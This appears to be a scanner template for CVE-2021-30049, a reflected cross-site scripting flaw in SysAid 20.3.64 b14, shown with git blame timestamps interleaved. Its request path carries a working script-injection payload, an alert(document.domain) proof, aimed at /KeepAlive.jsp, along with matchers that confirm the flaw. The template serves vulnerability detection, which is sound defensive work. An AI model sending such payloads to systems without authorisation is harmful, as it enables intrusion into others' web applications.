2021-09-17 11:55:39 +00:00
|
|
|
id: CVE-2021-30049
|
|
|
|
|
|
|
|
info:
|
2022-08-29 13:55:23 +00:00
|
|
|
name: SysAid Technologies 20.3.64 b14 - Cross-Site Scripting
|
2021-09-17 11:55:39 +00:00
|
|
|
author: daffainfo
|
|
|
|
severity: medium
|
2022-08-29 13:55:23 +00:00
|
|
|
description: SysAid 20.3.64 b14 contains a cross-site scripting vulnerability via the /KeepAlive.jsp?stamp= URI.
|
2021-09-17 11:55:39 +00:00
|
|
|
reference:
|
|
|
|
- https://eh337.net/2021/03/30/sysaid/
|
2022-08-29 13:55:23 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-30049
|
2021-09-17 12:44:33 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2021-09-17 12:44:33 +00:00
|
|
|
cve-id: CVE-2021-30049
|
|
|
|
cwe-id: CWE-79
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: cve,cve2021,xss
|
2021-09-17 11:55:39 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2021-09-17 12:26:34 +00:00
|
|
|
- '{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
2021-09-17 11:55:39 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
2021-09-17 12:26:34 +00:00
|
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
part: body
|
|
|
|
|
2021-09-17 11:55:39 +00:00
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "text/html"
|
2021-09-17 12:26:34 +00:00
|
|
|
|
2021-09-17 11:55:39 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-08-29 13:55:23 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/08/28
|